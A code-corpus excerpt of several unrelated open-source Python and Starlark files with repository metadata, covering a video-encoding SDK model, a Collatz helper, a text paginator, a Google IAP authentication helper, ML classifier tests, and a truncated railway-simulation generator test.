bitmovin/resources/models/encodings/muxings/muxing.py
|
camberbridge/bitmovin-python
|
3af4c6e79b0291fda05fd1ceeb5bed1bba9f3c95
|
[
"Unlicense"
] | null | null | null |
bitmovin/resources/models/encodings/muxings/muxing.py
|
camberbridge/bitmovin-python
|
3af4c6e79b0291fda05fd1ceeb5bed1bba9f3c95
|
[
"Unlicense"
] | null | null | null |
bitmovin/resources/models/encodings/muxings/muxing.py
|
camberbridge/bitmovin-python
|
3af4c6e79b0291fda05fd1ceeb5bed1bba9f3c95
|
[
"Unlicense"
] | null | null | null |
from bitmovin.errors import InvalidTypeError
from bitmovin.resources.models import AbstractModel
from bitmovin.resources import AbstractNameDescriptionResource
from bitmovin.resources.models.encodings.encoding_output import EncodingOutput
from bitmovin.resources.models.encodings.ignored_by import IgnoredBy
from bitmovin.utils import Serializable
from .muxing_stream import MuxingStream
class Muxing(AbstractNameDescriptionResource, AbstractModel, Serializable):
def __init__(self, streams, outputs=None, id_=None, custom_data=None, name=None, description=None,
avg_bitrate=None, max_bitrate=None, min_bitrate=None, ignored_by=None):
super().__init__(id_=id_, custom_data=custom_data, name=name, description=description)
self._streams = []
self._outputs = None
self._ignoredBy = None
if streams is None or not isinstance(streams, list):
raise InvalidTypeError('streams must be a list')
self.streams = streams
if outputs is not None and not isinstance(outputs, list):
raise InvalidTypeError('outputs must be a list')
self.outputs = outputs
self.avgBitrate = avg_bitrate
self.minBitrate = min_bitrate
self.maxBitrate = max_bitrate
if ignored_by is not None and not isinstance(ignored_by, list):
raise InvalidTypeError('ignoredBy must be a list')
self.ignored_by = ignored_by
@classmethod
def parse_from_json_object(cls, json_object):
id_ = json_object['id']
custom_data = json_object.get('customData')
streams = json_object.get('streams')
outputs = json_object.get('outputs')
name = json_object.get('name')
description = json_object.get('description')
avg_bitrate = json_object.get('avgBitrate')
max_bitrate = json_object.get('maxBitrate')
min_bitrate = json_object.get('minBitrate')
ignored_by = json_object.get('ignoredBy')
muxing = Muxing(id_=id_, custom_data=custom_data, streams=streams, outputs=outputs,
name=name, description=description, avg_bitrate=avg_bitrate, max_bitrate=max_bitrate,
min_bitrate=min_bitrate, ignored_by=ignored_by)
return muxing
@property
def streams(self):
return self._streams
@streams.setter
def streams(self, new_streams):
if new_streams is None:
return
if not isinstance(new_streams, list):
raise InvalidTypeError('new_streams has to be a list of StreamInput objects')
if all(isinstance(muxing_stream, MuxingStream) for muxing_stream in new_streams):
self._streams = new_streams
else:
muxing_streams = []
for json_object in new_streams:
muxing_stream = MuxingStream.parse_from_json_object(json_object)
muxing_streams.append(muxing_stream)
self._streams = muxing_streams
@property
def outputs(self):
return self._outputs
@outputs.setter
def outputs(self, new_outputs):
if new_outputs is None:
return
if not isinstance(new_outputs, list):
raise InvalidTypeError('new_outputs has to be a list of EncodingOutput objects')
if all(isinstance(output, EncodingOutput) for output in new_outputs):
self._outputs = new_outputs
else:
outputs = []
for json_object in new_outputs:
output = EncodingOutput.parse_from_json_object(json_object)
outputs.append(output)
self._outputs = outputs
@property
def ignored_by(self):
return self._ignoredBy
@ignored_by.setter
def ignored_by(self, new_ignored_by):
if new_ignored_by is None:
return
if not isinstance(new_ignored_by, list):
raise InvalidTypeError('ignored_by has to be a list of IgnoredBy objects')
if all(isinstance(ignored_by, IgnoredBy) for ignored_by in new_ignored_by):
self._ignoredBy = new_ignored_by
else:
ignored_by_array = []
for json_object in new_ignored_by:
ignored_by_obj = IgnoredBy.parse_from_json_object(json_object)
ignored_by_array.append(ignored_by_obj)
self._ignoredBy = ignored_by_array
def add_stream(self, stream_id):
muxing_stream = MuxingStream(stream_id=stream_id)
self._streams.append(muxing_stream)
def serialize(self):
serialized = super().serialize()
serialized['streams'] = self.streams
serialized['outputs'] = self.outputs
return serialized
| 38.631148
| 109
| 0.669637
|
5559d973b142d27fd090e19f2cc183667397db31
| 188
|
py
|
Python
|
src/py/util/collatz.py
|
cgnik/euler
|
fe70459a0e0d0272980300a4782872f2e545fea5
|
[
"MIT"
] | null | null | null |
src/py/util/collatz.py
|
cgnik/euler
|
fe70459a0e0d0272980300a4782872f2e545fea5
|
[
"MIT"
] | null | null | null |
src/py/util/collatz.py
|
cgnik/euler
|
fe70459a0e0d0272980300a4782872f2e545fea5
|
[
"MIT"
] | null | null | null |
def collatz(n):
if n % 2 == 0:
return int(n / 2)
return (n * 3) + 1
def collatz_series(n):
a = n
while a != 1:
a = collatz(a)
yield a
return 1
| 15.666667
| 25
| 0.452128
|
baf0aa060f2fb2c258269802458a7ebdfa2a97ea
| 1,542
|
bzl
|
Python
|
test/starlark_tests/rules/output_group_test.bzl
|
tnek/rules_apple
|
739aa74febeb95902dded57f7a49c85c1f153756
|
[
"Apache-2.0"
] | 313
|
2017-03-29T21:47:08.000Z
|
2022-03-29T03:09:50.000Z
|
test/starlark_tests/rules/output_group_test.bzl
|
tnek/rules_apple
|
739aa74febeb95902dded57f7a49c85c1f153756
|
[
"Apache-2.0"
] | 786
|
2017-03-30T16:15:59.000Z
|
2022-03-31T19:58:05.000Z
|
test/starlark_tests/rules/output_group_test.bzl
|
tnek/rules_apple
|
739aa74febeb95902dded57f7a49c85c1f153756
|
[
"Apache-2.0"
] | 172
|
2017-04-24T01:55:24.000Z
|
2022-03-25T19:23:31.000Z
|
# Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starlark test rules for output groups."""
load(
"@bazel_skylib//lib:unittest.bzl",
"analysistest",
"asserts",
)
def _output_group_test_impl(ctx):
"""Implementation of the output_group_test rule."""
env = analysistest.begin(ctx)
target_under_test = ctx.attr.target_under_test
expected_groups = ctx.attr.expected_output_groups
for expected_group in expected_groups:
asserts.true(
env,
expected_group in target_under_test[OutputGroupInfo],
msg = "Expected output group not found\n\n\"{0}\"".format(
expected_group,
),
)
return analysistest.end(env)
output_group_test = analysistest.make(
_output_group_test_impl,
attrs = {
"expected_output_groups": attr.string_list(
mandatory = True,
doc = """List of output groups that should be present in the target.""",
),
},
)
| 31.469388
| 84
| 0.683528
|
d419f911e78c1be8a0cde7b07b12f566eb7e9ee2
| 1,273
|
py
|
Python
|
Cap_9/ex9.8/ex9.8.py
|
gguilherme42/Livro-de-Python
|
465a509d50476fd1a87239c71ed741639d58418b
|
[
"MIT"
] | 4
|
2020-04-07T00:38:46.000Z
|
2022-03-10T03:34:42.000Z
|
Cap_9/ex9.8/ex9.8.py
|
gguilherme42/Livro-de-Python
|
465a509d50476fd1a87239c71ed741639d58418b
|
[
"MIT"
] | null | null | null |
Cap_9/ex9.8/ex9.8.py
|
gguilherme42/Livro-de-Python
|
465a509d50476fd1a87239c71ed741639d58418b
|
[
"MIT"
] | 1
|
2021-04-22T02:45:38.000Z
|
2021-04-22T02:45:38.000Z
|
import sys
if len(sys.argv) != 3:
raise print('script.py line_lenght lines_per_page')
LARGURA = int(sys.argv[1]) #Comandos do terminal são strings
LINHAS = int(sys.argv[2])
NOME_DO_ARQUIVO = "StuartMill_OnLiberty.txt"
def verifica_pagina(arquivo, linha, pagina):
if(linha == LINHAS):
rodape = f"= {NOME_DO_ARQUIVO} - Página: {pagina} ="
arquivo.write(rodape.center(LARGURA - 1) + "\n")
pagina += 1
linha = 1
return linha, pagina
def escreve(arquivo, linha, nlinhas, pagina):
arquivo.write(linha + "\n")
return verifica_pagina(arquivo, nlinhas+1, pagina)
entrada = open(NOME_DO_ARQUIVO, encoding="utf-8")
saida = open("saida_paginada.txt", "w", encoding="utf-8")
pagina = 1
linhas = 1
for linha in entrada.readlines():
palavras = linha.rstrip().split(" ")
linha = ""
for p in palavras:
p = p.strip()
if (len(linha) + len(p) + 1) > LARGURA:
linhas, pagina=escreve(saida, linha, linhas, pagina)
linha = ""
linha += p + " "
if(linha != ""):
linhas, pagina = escreve(saida, linha, linhas, pagina)
# Para imprimir o número na última página
while(linhas!=1):
linhas, pagina=escreve(saida, "", linhas, pagina)
entrada.close()
saida.close()
| 25.979592
| 64
| 0.627651
|
dc77d36aba2e06a5068c75533c4cc434d016f077
| 3,133
|
py
|
Python
|
api/worldmap.py
|
TilakMaddy/OpenPoGoBot
|
09d11c5349599add5d26518b784d014612adc3d1
|
[
"MIT"
] | 183
|
2016-07-23T22:29:18.000Z
|
2016-09-25T15:39:10.000Z
|
api/worldmap.py
|
OpenPoGo/OpenPoGo
|
02a6c955a36e25f7dd7d325f20ea9d6f5418a911
|
[
"MIT"
] | 354
|
2016-07-23T21:43:27.000Z
|
2016-09-15T21:01:39.000Z
|
api/worldmap.py
|
OpenPoGo/OpenPoGo
|
02a6c955a36e25f7dd7d325f20ea9d6f5418a911
|
[
"MIT"
] | 104
|
2016-07-23T22:28:58.000Z
|
2016-09-09T11:28:01.000Z
|
# pylint: disable=redefined-builtin
from builtins import str
import time
from api.json_encodable import JSONEncodable
class Fort(JSONEncodable):
def __init__(self, data):
self.fort_id = data.get("id", "")
self.fort_name = data.get("name", "Unknown").encode('ascii', 'replace')
# TODO: Make this proper unicode ^^
self.latitude = data.get("latitude", None)
self.longitude = data.get("longitude", None)
self.enabled = data.get("enabled", True)
self.last_modified_timestamp_ms = data.get("last_modified_timestamp_ms", 0)
self.fort_type = data.get("type", 0)
class PokeStop(Fort):
def __init__(self, data):
super(PokeStop, self).__init__(data)
self.active_fort_modifier = data.get("active_fort_modifier", None)
self.cooldown_timestamp_ms = data.get("cooldown_complete_timestamp_ms", None)
lure_info = data.get("lure_info", {})
self.lure_expires_timestamp_ms = lure_info.get("lure_expires_timestamp_ms", None)
self.lure_encounter_id = lure_info.get("encounter_id", None)
self.lure_pokemon_id = lure_info.get("active_pokemon_id", None)
self.lure_fort_id = lure_info.get("fort_id", None)
self.fort_type = 1
def is_lure_active(self):
if self.lure_expires_timestamp_ms is None:
return False
return self.lure_expires_timestamp_ms + 1000 > time.time() * 1000
def is_in_cooldown(self):
if self.cooldown_timestamp_ms is None:
return False
return self.cooldown_timestamp_ms + 1000 > time.time() * 1000
class Gym(Fort):
def __init__(self, data):
super(Gym, self).__init__(data)
self.is_in_battle = True if data.get("is_in_battle", 0) == 1 else False
self.guard_pokemon_id = data.get("guard_pokemon_id", None)
self.owned_by_team = data.get("owned_by_team", 0)
self.gym_points = data.get("gym_points", 0)
class Cell(JSONEncodable):
def __init__(self, data):
self.spawn_points = []
self.gyms = []
self.pokestops = []
self.cell_id = data.get("s2_cell_id", 0)
spawn_points = data.get("spawn_points", [])
for spawn in spawn_points:
self.spawn_points.append((spawn["latitude"], spawn["longitude"]))
self.catchable_pokemon = data.get("catchable_pokemons", [])
self.nearby_pokemon = data.get("nearby_pokemons", [])
self.wild_pokemon = data.get("wild_pokemons", [])
forts = data.get("forts", [])
for fort in forts:
if fort.get("type", 0) == 1:
self.pokestops.append(PokeStop(fort))
elif fort.get("type", 0) == 2:
self.gyms.append(Gym(fort))
else:
# Some unknown kind of fort or invalid data
pass
class WorldMap(JSONEncodable):
def __init__(self):
self.cells = []
def update_map_objects(self, data):
cells = data.get("map_cells", [])
for cell_data in cells:
cell = Cell(cell_data)
self.cells.append(cell)
| 34.428571
| 89
| 0.622726
|
6f3ae4a21a86e819068db9106ce4b22cd7895e5d
| 3,122
|
py
|
Python
|
pyiap/make_iap_request.py
|
newsdev/nyt-pyiap
|
7b0bdcbe8d0ac4f3c63a65ea069297792c150422
|
[
"Apache-2.0"
] | 3
|
2018-07-18T11:19:37.000Z
|
2019-02-25T19:22:30.000Z
|
pyiap/make_iap_request.py
|
newsdev/nyt-pyiap
|
7b0bdcbe8d0ac4f3c63a65ea069297792c150422
|
[
"Apache-2.0"
] | null | null | null |
pyiap/make_iap_request.py
|
newsdev/nyt-pyiap
|
7b0bdcbe8d0ac4f3c63a65ea069297792c150422
|
[
"Apache-2.0"
] | 3
|
2017-05-30T23:26:08.000Z
|
2020-04-22T15:32:40.000Z
|
import os
import google.auth
import google.auth.app_engine
import google.auth.compute_engine.credentials
import google.auth.iam
from google.auth.transport.requests import Request
import google.oauth2.credentials
import google.oauth2.service_account
from google.oauth2 import service_account
import requests
import requests_toolbelt.adapters.appengine
from six.moves import urllib_parse as urlparse
GCP_SECRETS = os.environ.get('GCP_SERVICE_WORKER_CREDS', '/tmp/gcp-service-worker-creds.json')
IAM_SCOPE = os.environ.get('GCP_IAM_SCOPE', 'https://www.googleapis.com/auth/iam')
OAUTH_TOKEN_URI = os.environ.get('GCP_OAUTH_TOKEN_URI', 'https://www.googleapis.com/oauth2/v4/token')
def iap_request(url, data=None, headers=None):
if "localhost.newsdev.net" in url:
resp = requests.post(url, headers=headers, data=data)
else:
base_url = urlparse.urlunparse(
urlparse.urlparse(url)._replace(path='', query='', fragment=''))
credentials = service_account.Credentials.from_service_account_file(GCP_SECRETS)
bootstrap_credentials = credentials.with_scopes([IAM_SCOPE])
if isinstance(bootstrap_credentials, google.oauth2.credentials.Credentials):
raise Exception('make_iap_request is only supported for service accounts.')
bootstrap_credentials.refresh(Request())
signer_email = bootstrap_credentials.service_account_email
if isinstance(bootstrap_credentials, google.auth.compute_engine.credentials.Credentials):
signer = google.auth.iam.Signer(Request(), bootstrap_credentials, signer_email)
else:
signer = bootstrap_credentials.signer
service_account_credentials = google.oauth2.service_account.Credentials(
signer, signer_email, token_uri=OAUTH_TOKEN_URI, additional_claims={
'target_audience': base_url
})
google_open_id_connect_token = get_google_open_id_connect_token(service_account_credentials)
# Append our header to a list of possible headers.
if not headers:
headers = {'Authorization': 'Bearer {}'.format(google_open_id_connect_token)}
else:
headers['Authorization'] = 'Bearer {}'.format(google_open_id_connect_token)
resp = requests.post(url, headers=headers, data=data)
if resp.status_code == 403:
raise Exception('Service account {} does not have permission to '
'access the IAP-protected application.'.format(
signer_email))
if resp.status_code != 200:
return resp.text
return resp.text
def get_google_open_id_connect_token(service_account_credentials):
service_account_jwt = (service_account_credentials._make_authorization_grant_assertion())
request = google.auth.transport.requests.Request()
body = {
'assertion': service_account_jwt,
'grant_type': google.oauth2._client._JWT_GRANT_TYPE,
}
token_response = google.oauth2._client._token_endpoint_request(request, OAUTH_TOKEN_URI, body)
return token_response['id_token']
| 40.025641
| 101
| 0.722293
|
e22f915f4ca9e7b33c267c82b93101d8a5c78309
| 176
|
py
|
Python
|
Inversor.py
|
fedegy/ipc1E_corto3
|
807807d78960a9cc1a2a1d06c5143af15bbf20f2
|
[
"Apache-2.0"
] | null | null | null |
Inversor.py
|
fedegy/ipc1E_corto3
|
807807d78960a9cc1a2a1d06c5143af15bbf20f2
|
[
"Apache-2.0"
] | null | null | null |
Inversor.py
|
fedegy/ipc1E_corto3
|
807807d78960a9cc1a2a1d06c5143af15bbf20f2
|
[
"Apache-2.0"
] | null | null | null |
class Inversor:
def __init__(self,resultado):
self.resultado=resultado
def dump(self):
return{
'resutlado' : self.resultado
}
| 17.6
| 40
| 0.556818
|
87109cc1d6b8b1e135fac77709389fd427b1590d
| 8,301
|
py
|
Python
|
demisto_sdk/commands/json_to_outputs/json_to_outputs.py
|
sturmianseq/demisto-sdk
|
67ce7ee70ccd557d661e03a60469301c5cbcb9c0
|
[
"MIT"
] | null | null | null |
demisto_sdk/commands/json_to_outputs/json_to_outputs.py
|
sturmianseq/demisto-sdk
|
67ce7ee70ccd557d661e03a60469301c5cbcb9c0
|
[
"MIT"
] | null | null | null |
demisto_sdk/commands/json_to_outputs/json_to_outputs.py
|
sturmianseq/demisto-sdk
|
67ce7ee70ccd557d661e03a60469301c5cbcb9c0
|
[
"MIT"
] | null | null | null |
"""
This script parses a raw response from an API(JSON) into yml formatted file with the context path of each field.
For example:
{
"id":12131,
"description":"desc",
"summary":"do-not-delete",
"created":"2019-03-25T16:13:13.188+0200",
"issuetype":{
"id":10004,
"name":"Bug"
},
"project":{
"id":10001,
"key":"SOC",
"projectTypeKey":"software"
},
"status":{
"id":10003,
"StatusCategory":{
"key":"new",
"colorName":"blue-gray",
"name":"To Do"
}
}
}
==>
arguments: []
name: integration-command
outputs:
- contextPath: Demisto.Id
description: ''
type: Number
- contextPath: Demisto.Description
description: ''
type: String
- contextPath: Demisto.Summary
description: ''
type: String
- contextPath: Demisto.Created
description: ''
type: String
- contextPath: Demisto.Issuetype.Id
description: ''
type: Number
- contextPath: Demisto.Issuetype.Name
description: ''
type: String
- contextPath: Demisto.Project.Id
description: ''
type: Number
- contextPath: Demisto.Project.Key
description: ''
type: String
- contextPath: Demisto.Project.ProjectTypeKey
description: ''
type: String
- contextPath: Demisto.Status.Id
description: ''
type: Number
- contextPath: Demisto.Status.StatusCategory.Key
description: ''
type: String
- contextPath: Demisto.Status.StatusCategory.Colorname
description: ''
type: String
- contextPath: Demisto.Status.StatusCategory.Name
description: ''
type: String
"""
import json
import os
import sys
from typing import Dict, Optional
import dateparser
import yaml
from demisto_sdk.commands.common.tools import (LOG_COLORS, print_color,
print_error)
def input_multiline():
sentinel = '' # ends when this string is seen
return '\n'.join(iter(input, sentinel))
def flatten_json(nested_json, camelize=False):
out = {}
def flatten(x, name=''):
# capitalize first letter in each key
try:
name = name[0].upper() + name[1:] if camelize else name
except IndexError:
name = name.title() if camelize else name
if isinstance(x, dict):
for a in x:
flatten(x[a], name + a + '.')
elif isinstance(x, list):
for a in x:
flatten(a, name[:-1] + '.')
else:
out[name.rstrip('.')] = x
flatten(nested_json)
return out
def jsonise(context_key, value, description=''):
return {
'contextPath': context_key,
'description': description,
'type': determine_type(value)
}
def is_date(val):
"""
Determines if val is Date, if yes returns True otherwise False
"""
if isinstance(val, (int, float)) and val > 15737548065 and val < 2573754806500:
# 15737548065 is the lowest timestamp that exist year - 1970
# 2573754806500 is the year 2050 - I believe no json will contain date time over this time
# if number is between these two numbers it probably is timestamp=date
return True
if isinstance(val, str) and len(val) >= 10 and len(val) <= 30 and dateparser.parse(val):
# the shortest date string is => len(2019-10-10) = 10
# The longest date string I could think of wasn't of length over len=30 '2019-10-10T00:00:00.000 +0900'
# To reduce in performance of using dateparser.parse,I
return True
return False
def determine_type(val):
if is_date(val):
return 'Date'
if isinstance(val, str):
return 'String'
# bool is an sub class of int, so the we should first check isinstance of bool and only afterwards int
if isinstance(val, bool):
return 'Boolean'
if isinstance(val, (int, float)):
return 'Number'
return 'Unknown'
def parse_json(data, command_name, prefix, verbose=False, interactive=False, descriptions: Optional[Dict] = None):
if data == '':
raise ValueError('Invalid input JSON - got empty string')
try:
data = json.loads(data)
except ValueError as ex:
if verbose:
print_error(str(ex))
raise ValueError('Invalid input JSON')
# If data is a list of dictionaries [{'a': 'b', 'c': 'd'}, {'e': 'f'}] -> {'a': 'b', 'c': 'd', 'e': 'f'}.
# In case there are two identical keys (in two different dictionaries) with values of different types,
# the type will be determined by the last dictionary [{'a': 'b'}, {'a': 1}] -> {'a': 1} -> type of 'a' = Number.
if isinstance(data, list):
data = {k: v for d in data for k, v in d.items()}
flattened_data = flatten_json(data)
if prefix:
flattened_data = {f'{prefix}.{key}': value for key, value in flattened_data.items()}
if descriptions:
descriptions = {f'{prefix}.{key}': value for key, value in descriptions.items()}
arg_json = []
for key, value in flattened_data.items():
description = ''
if descriptions and key in descriptions:
description = descriptions[key]
elif interactive:
print(f'Enter description for: [{key}]')
description = input_multiline()
arg_json.append(jsonise(key, value, description))
if verbose:
print(f'JSON before converting to YAML: {arg_json}')
yaml_output = yaml.safe_dump(
{
'name': command_name.lstrip('!'),
'arguments': [],
'outputs': arg_json
},
default_flow_style=False
)
return yaml_output
def json_to_outputs(command, input, prefix, output=None, verbose=False, interactive=False, descriptions=None):
"""
This script parses JSON to Demisto Outputs YAML format
Args:
command: the name of the command that this output is belong like xdr-get-incidents
input: full path to valid JSON file - the JSON file should contain API response from the service
prefix: The prefix of the context, this prefix will appear for each output field - VirusTotal.IP,
CortexXDR.Incident
output: Full path to output file where to save the YAML
verbose: This used for debugging purposes - more logs
interactive: by default all the output descriptions are empty, but if user sets this to True then the script
will ask user input for each description
descriptions: JSON or path to JSON file mapping field names to their context descriptions. (Optional)
Returns:
"""
try:
if input:
with open(input, 'r') as json_file:
input_json = json_file.read()
else:
print("Enter the command's output in JSON format.\n "
"As an example, If one of the command's output is `item_id`,\n enter {\"item_id\": 1234}")
input_json = input_multiline()
descriptions = _parse_description_argument(descriptions)
yaml_output = parse_json(input_json, command, prefix, verbose, interactive, descriptions)
if output:
with open(output, 'w') as yf:
yf.write(yaml_output)
print_color(f'Outputs file was saved to :\n{output}', LOG_COLORS.GREEN)
else:
print_color("YAML Outputs\n\n", LOG_COLORS.GREEN)
print(yaml_output)
except Exception as ex:
if verbose:
raise
else:
print_error(f'Error: {str(ex)}')
sys.exit(1)
def _parse_description_argument(descriptions: Optional[str]) -> Optional[dict]: # type: ignore
"""Parses the descriptions argument, be it a path to JSON or a JSON body given as argument """
if not descriptions: # None or empty
return None
try:
if os.path.exists(descriptions): # file input
with open(descriptions, encoding='utf8') as f:
return json.load(f)
else:
parsed = json.loads(descriptions) # argument input
if not isinstance(parsed, Dict):
raise TypeError("Expected a dictionary")
return parsed
except (json.JSONDecodeError, TypeError):
print("Error decoding JSON descriptions, ignoring them.")
| 30.630996
| 116
| 0.617757
|
8672385d04f6b7cd04f12ee5b7a183f75c529b22
| 226
|
py
|
Python
|
slack_bot_manager/urls.py
|
devights/coffeebot
|
ade8ed3c7fc77eaaed049b7f290d8afca318593a
|
[
"Apache-2.0"
] | null | null | null |
slack_bot_manager/urls.py
|
devights/coffeebot
|
ade8ed3c7fc77eaaed049b7f290d8afca318593a
|
[
"Apache-2.0"
] | null | null | null |
slack_bot_manager/urls.py
|
devights/coffeebot
|
ade8ed3c7fc77eaaed049b7f290d8afca318593a
|
[
"Apache-2.0"
] | null | null | null |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^$', 'bot_manager.views.home.home', name='home'),
url(r'^botmgr/', include('bot_manager.urls')),
)
| 28.25
| 59
| 0.69469
|
2fb6d7c687adfd33f3cc091b69cc218d8efcffdd
| 2,697
|
py
|
Python
|
backend/server/apps/ml/tests.py
|
pratsingh/ML_Django_Project
|
c39266601ae86c3c708ccb566872beea3bff37bc
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/tests.py
|
pratsingh/ML_Django_Project
|
c39266601ae86c3c708ccb566872beea3bff37bc
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/tests.py
|
pratsingh/ML_Django_Project
|
c39266601ae86c3c708ccb566872beea3bff37bc
|
[
"MIT"
] | null | null | null |
import inspect
from apps.ml.registry import MLRegistry
from django.test import TestCase
from apps.ml.income_classifier.extra_trees import ExtraTreesClassifier
from apps.ml.income_classifier.random_forest import RandomForestClassifier
class MLTests(TestCase):
def test_rf_algorithm(self):
input_data = {
"age": 37,
"workclass": "Private",
"fnlwgt": 34146,
"education": "HS-grad",
"education-num": 9,
"marital-status": "Married-civ-spouse",
"occupation": "Craft-repair",
"relationship": "Husband",
"race": "White",
"sex": "Male",
"capital-gain": 0,
"capital-loss": 0,
"hours-per-week": 68,
"native-country": "United-States"
}
my_alg = RandomForestClassifier()
response = my_alg.compute_prediction(input_data)
self.assertEqual('OK', response['status'])
self.assertTrue('label' in response)
self.assertEqual('<=50K', response['label'])
def test_registry(self):
registry = MLRegistry()
self.assertEqual(len(registry.endpoints), 0)
endpoint_name = "income_classifier"
algorithm_object = RandomForestClassifier()
algorithm_name = "random forest"
algorithm_status = "production"
algorithm_version = "0.0.1"
algorithm_owner = "usr"
algorithm_description = "Random Forest with simple pre- and post-processing"
algorithm_code = inspect.getsource(RandomForestClassifier)
# add to registry
registry.add_algorithm(endpoint_name, algorithm_object, algorithm_name,
algorithm_status, algorithm_version, algorithm_owner,
algorithm_description, algorithm_code)
# one endpoint
self.assertEqual(len(registry.endpoints), 1)
def test_et_algorithm(self):
input_data = {
"age": 37,
"workclass": "Private",
"fnlwgt": 34146,
"education": "HS-grad",
"education-num": 9,
"marital-status": "Married-civ-spouse",
"occupation": "Craft-repair",
"relationship": "Husband",
"race": "White",
"sex": "Male",
"capital-gain": 0,
"capital-loss": 0,
"hours-per-week": 68,
"native-country": "United-States"
}
my_alg = ExtraTreesClassifier()
response = my_alg.compute_prediction(input_data)
self.assertEqual('OK', response['status'])
self.assertTrue('label' in response)
self.assertEqual('<=50K', response['label'])
| 37.458333
| 84
| 0.58769
|
ec267c9ac48e8262579e34b26bd200b8b5d663e9
| 305
|
py
|
Python
|
2016/01/unemployment-20160108/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 14
|
2015-05-08T13:41:51.000Z
|
2021-02-24T12:34:55.000Z
|
2016/01/unemployment-20160108/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | null | null | null |
2016/01/unemployment-20160108/graphic_config.py
|
nprapps/graphics-archive
|
97b0ef326b46a959df930f5522d325e537f7a655
|
[
"FSFAP"
] | 7
|
2015-04-04T04:45:54.000Z
|
2021-02-18T11:12:48.000Z
|
#!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1mCqs8ehZe64_muXgzaoRQcexPhTNkKqAL1tXsIUmjBY'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| 21.785714
| 77
| 0.819672
|
ad2fc43105f494b003ef1317125835a98f1b89f1
| 81,140
|
py
|
Python
|
tests/test_flatland_envs_sparse_rail_generator.py
|
null-pi/flatland-challenge
|
babc6895551f96da1c1b6bea6953db498cfa8644
|
[
"MIT"
] | null | null | null |
tests/test_flatland_envs_sparse_rail_generator.py
|
null-pi/flatland-challenge
|
babc6895551f96da1c1b6bea6953db498cfa8644
|
[
"MIT"
] | 1
|
2020-09-04T13:57:01.000Z
|
2020-09-09T19:21:33.000Z
|
tests/test_flatland_envs_sparse_rail_generator.py
|
null-pi/flatland-challenge
|
babc6895551f96da1c1b6bea6953db498cfa8644
|
[
"MIT"
] | null | null | null |
import unittest
import warnings
import numpy as np
from flatland.core.grid.grid_utils import Vec2dOperations as Vec2d
from flatland.envs.observations import GlobalObsForRailEnv
from flatland.envs.rail_env import RailEnv
from flatland.envs.rail_generators import sparse_rail_generator
from flatland.envs.schedule_generators import sparse_schedule_generator
from flatland.utils.rendertools import RenderTool
def test_sparse_rail_generator():
env = RailEnv(width=50, height=50, rail_generator=sparse_rail_generator(max_num_cities=10,
max_rails_between_cities=3,
seed=5,
grid_mode=False
),
schedule_generator=sparse_schedule_generator(), number_of_agents=10,
obs_builder_object=GlobalObsForRailEnv())
env.reset(False, False, True)
for r in range(env.height):
for c in range(env.width):
if env.rail.grid[r][c] > 0:
print("expected_grid_map[{}][{}] = {}".format(r, c, env.rail.grid[r][c]))
expected_grid_map = np.zeros((50, 50), dtype=env.rail.transitions.get_type())
expected_grid_map[0][6] = 16386
expected_grid_map[0][7] = 1025
expected_grid_map[0][8] = 1025
expected_grid_map[0][9] = 1025
expected_grid_map[0][10] = 1025
expected_grid_map[0][11] = 1025
expected_grid_map[0][12] = 1025
expected_grid_map[0][13] = 17411
expected_grid_map[0][14] = 1025
expected_grid_map[0][15] = 1025
expected_grid_map[0][16] = 1025
expected_grid_map[0][17] = 1025
expected_grid_map[0][18] = 5633
expected_grid_map[0][19] = 5633
expected_grid_map[0][20] = 20994
expected_grid_map[0][21] = 1025
expected_grid_map[0][22] = 1025
expected_grid_map[0][23] = 1025
expected_grid_map[0][24] = 1025
expected_grid_map[0][25] = 1025
expected_grid_map[0][26] = 1025
expected_grid_map[0][27] = 1025
expected_grid_map[0][28] = 1025
expected_grid_map[0][29] = 1025
expected_grid_map[0][30] = 1025
expected_grid_map[0][31] = 1025
expected_grid_map[0][32] = 1025
expected_grid_map[0][33] = 1025
expected_grid_map[0][34] = 1025
expected_grid_map[0][35] = 1025
expected_grid_map[0][36] = 1025
expected_grid_map[0][37] = 1025
expected_grid_map[0][38] = 1025
expected_grid_map[0][39] = 4608
expected_grid_map[1][6] = 32800
expected_grid_map[1][7] = 16386
expected_grid_map[1][8] = 1025
expected_grid_map[1][9] = 1025
expected_grid_map[1][10] = 1025
expected_grid_map[1][11] = 1025
expected_grid_map[1][12] = 1025
expected_grid_map[1][13] = 34864
expected_grid_map[1][18] = 32800
expected_grid_map[1][19] = 32800
expected_grid_map[1][20] = 32800
expected_grid_map[1][39] = 32800
expected_grid_map[2][6] = 32800
expected_grid_map[2][7] = 32800
expected_grid_map[2][8] = 16386
expected_grid_map[2][9] = 1025
expected_grid_map[2][10] = 1025
expected_grid_map[2][11] = 1025
expected_grid_map[2][12] = 1025
expected_grid_map[2][13] = 2064
expected_grid_map[2][18] = 32872
expected_grid_map[2][19] = 37408
expected_grid_map[2][20] = 32800
expected_grid_map[2][39] = 32872
expected_grid_map[2][40] = 4608
expected_grid_map[3][6] = 32800
expected_grid_map[3][7] = 32800
expected_grid_map[3][8] = 32800
expected_grid_map[3][18] = 49186
expected_grid_map[3][19] = 34864
expected_grid_map[3][20] = 32800
expected_grid_map[3][39] = 49186
expected_grid_map[3][40] = 34864
expected_grid_map[4][6] = 32800
expected_grid_map[4][7] = 32800
expected_grid_map[4][8] = 32800
expected_grid_map[4][18] = 32800
expected_grid_map[4][19] = 32872
expected_grid_map[4][20] = 37408
expected_grid_map[4][38] = 16386
